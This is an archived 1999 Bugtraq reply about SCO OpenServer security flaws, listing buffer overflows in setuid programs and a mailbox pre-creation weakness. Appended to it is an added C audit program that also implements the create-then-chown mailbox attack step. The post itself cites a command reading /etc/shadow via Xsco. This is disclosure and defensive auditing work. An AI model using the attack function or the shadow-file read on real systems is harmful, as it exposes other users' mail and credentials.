Bugtraq mailing list archives
Re: SCO OpenServer Security Status
From: btellier () USA NET (Brock Tellier)
Date: Tue, 21 Dec 1999 14:31:36 MST
-snip-
> UnixWare read/modify users' mail (/var/spool/mail)
> This is also not applicable on OpenServer. OpenServer's equivalent
> is /usr/spool/mail which has 1777 perms (world-writable, but
> sticky so only owner can delete files). The local delivery agent will not
> deliver to a file not owned by the recipient; will not follow symlinks or
> write to a file with multiple names (hard links); and is designed to avoid
> race conditions.
The meat of this exploit is not only that the directory is mode 0777, but that, by SYSV standards (thanks to Aleph for clearing that up for me), we can change the owner of any file we own. Therefore, under OpenServer (SYSV based), we could still create a file, change the owner and have mail delivered to that user normally. I don't know if the OpenServer LDA will deliver to a file which is world-readable, however.

-snip-

I've marked in the Buffer Overflow list below which ones were known (in the sense of publicly posted) and which were not.
In addition to the first two vulnerabilities, we are also putting the finishing touches on another large collection of previously reported OpenServer vulnerabilities (and vulnerabilities we discovered ourselves) which will be available by December 25th. The current contents include (but will not be limited to):

1. Buffer overflows in:
/usr/mmdf/chans/smtpsrvr * unknown
/etc/killall * unknown
/etc/popper * known or newer version of old exploit
/usr/bin/mscreen * known or older version of old exploit
/usr/bin/rlogin * unknown (same as UnixWare gethostbyname()?)
/bin/su * unknown (same as UnixWare exploit?)
/usr/lib/sysadm/termsh * unknown, but I remember doing some work on this program. I'll re-post if I dig up my files on it.
/usr/lib/libX11.so.5.0 * all the X problems known 5 years ago
/usr/lib/libXt.so.5.0
/usr/lib/libXmu.so.5.0
/usr/lib/libXaw.so.5.0
/usr/lib/libX11.a
/usr/lib/libXt.a
/usr/lib/libXmu.a
/usr/lib/libXaw.a
/usr/bin/X11/xterm * known
/usr/bin/X11/xload * known
/usr/bin/X11/scoterm * known
/usr/bin/X11/scolock * known
/usr/bin/X11/scosession * known
/usr/bin/X11/scologin * known
/usr/lpd/remote/rlpstat * known
/usr/lpd/remote/cancel * known
/usr/lpd/remote/lpmove * known
BTW, if any of you Bugtraq people are in serious need of OpenServer exploits for any of the above, I would be happy to help out. I'm interested in finding out what the bug in smtpsrvr is, in particular.
2. Algorithmic vulnerabilities in:
/etc/sysadm.d/bin/userOsa: Can improperly write to privileged files
One of those complicated algorithmic symlink vulnerabilities :) known.
/usr/bin/X11/Xsco: Can improperly read privileged files (also buffer overflows)
Unknown, but: If I recall correctly, I reported this to SCO as a buffer overflow in -query <hostname> (with a long <hostname>). If there is an overflow there, I would suspect that OpenServer has the gethostbyname() overflow that UW7 has. My memory is just as shady on the "read privileged files" vulnerability. I think it was "Xsco -config /etc/shadow" that would print the first line of /etc/shadow in an error message.
/bin/hello: Can improperly access privileged devices
Allows transmission of dangerous characters
Dangerous characters? Unknown.
/bin/write: Allows transmission of dangerous characters
" " Unknown.
/bin/login: Corrupt /etc/dialups causes login failure
Insufficient error checking
Unknown.

Thanks to SCO for posting fix information publicly instead of only to www.sco.com/security and providing actual information about which programs are vulnerable (even if the information wasn't complete). I might've hoped for more timely fixes, but considering the sheer number of holes they had to deal with, I'm just glad they didn't wait until 5.0.6.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
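The mailbox pre-creation argument in the reply above rests on two preconditions: a world-writable (1777) spool directory, and SysV "give-away" chown, where the owner of a file may hand it to another uid. The following audit is an added example written for this archive page; it is not code from the post, from Brock Tellier or from SCO. It checks both preconditions on the host it runs on and includes the create-then-chown step the reply describes. The spool path /usr/spool/mail is taken from the quoted text; the victim name and the uid used in the probe are assumptions for illustration, and nothing here claims how the OpenServer LDA treats a file that has been pre-created this way.

```c
/* Added example (not from the post or from SCO): audit the two
 * preconditions for pre-creating another user's mailbox:
 *   1. the spool directory is world-writable (the "1777 perms" quoted above);
 *   2. the system allows SysV give-away chown (an owner may chown a file to
 *      someone else), as opposed to BSD/POSIX restricted chown.
 * On a modern Linux/BSD host the probe reports "restricted". */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 when the mode bits describe a world-writable, sticky directory
 * (mode 1777), else 0. */
int spool_mode_is_1777(mode_t mode)
{
    return S_ISDIR(mode) && (mode & S_IWOTH) != 0 && (mode & S_ISVTX) != 0;
}

/* 1 if anyone may create files in dir, 0 if not, -1 if dir cannot be stat'ed. */
int spool_world_writable(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0)
        return -1;
    return (st.st_mode & S_IWOTH) ? 1 : 0;
}

/* Actively test give-away chown: create an anonymous temp file in dir and try
 * to hand it to a uid we do not own (65534 is an assumption; any other uid
 * would do). Returns 1 if the chown succeeded (SysV semantics, precondition 2
 * holds), 0 if it failed with EPERM (restricted chown), -1 if inconclusive
 * (running as root, or dir not writable by us). */
int chown_giveaway_probe(const char *dir)
{
    char path[4096];
    int fd, rc, err;
    uid_t other = (getuid() == 65534) ? 1 : 65534;

    if (geteuid() == 0)
        return -1;                      /* root may always chown; no signal */
    snprintf(path, sizeof path, "%s/.chownprobe.XXXXXX", dir);
    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                       /* keep only the fd: no file left behind */
    rc = fchown(fd, other, (gid_t)-1);
    err = errno;
    close(fd);
    if (rc == 0)
        return 1;
    return err == EPERM ? 0 : -1;
}

/* The step the reply describes: create the victim's mailbox ourselves, mode
 * 0644 so it stays readable to us after we give it away, then chown it to the
 * victim. Returns 0 on success; -1 with errno set (and the file removed again)
 * if the mailbox already exists or the system refuses the chown. */
int precreate_mailbox(const char *spool, const char *victim, uid_t victim_uid)
{
    char path[4096];
    int fd, err;

    snprintf(path, sizeof path, "%s/%s", spool, victim);
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0)
        return -1;
    if (fchown(fd, victim_uid, (gid_t)-1) != 0) {
        err = errno;
        close(fd);
        unlink(path);                   /* we still own it, so cleanup works */
        errno = err;
        return -1;
    }
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    const char *spool = argc > 1 ? argv[1] : "/usr/spool/mail"; /* path from the quoted text */
    int ww = spool_world_writable(spool);
    int gw = chown_giveaway_probe(ww == 1 ? spool : "/tmp");

    printf("spool %s: world-writable=%d\n", spool, ww);
    printf("give-away chown: %s\n",
           gw == 1 ? "allowed (SysV)" : gw == 0 ? "restricted" : "inconclusive");
    if (ww == 1 && gw == 1)
        printf("both preconditions hold: a mailbox could be pre-created and chowned\n");
    return 0;
}
```

Run it as an unprivileged user, optionally passing the spool directory as the first argument; precreate_mailbox() is the step an attacker would take once both checks pass, and on a restricted-chown system it fails at fchown() and removes the file it created. Whether the delivery agent then honours a pre-created, world-readable mailbox is exactly the open question in the reply and is not something this audit can answer.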
Current thread:
- SCO OpenServer Security Status Michael Almond (Dec 20)
- <Possible follow-ups>
- Re: SCO OpenServer Security Status Brock Tellier (Dec 21)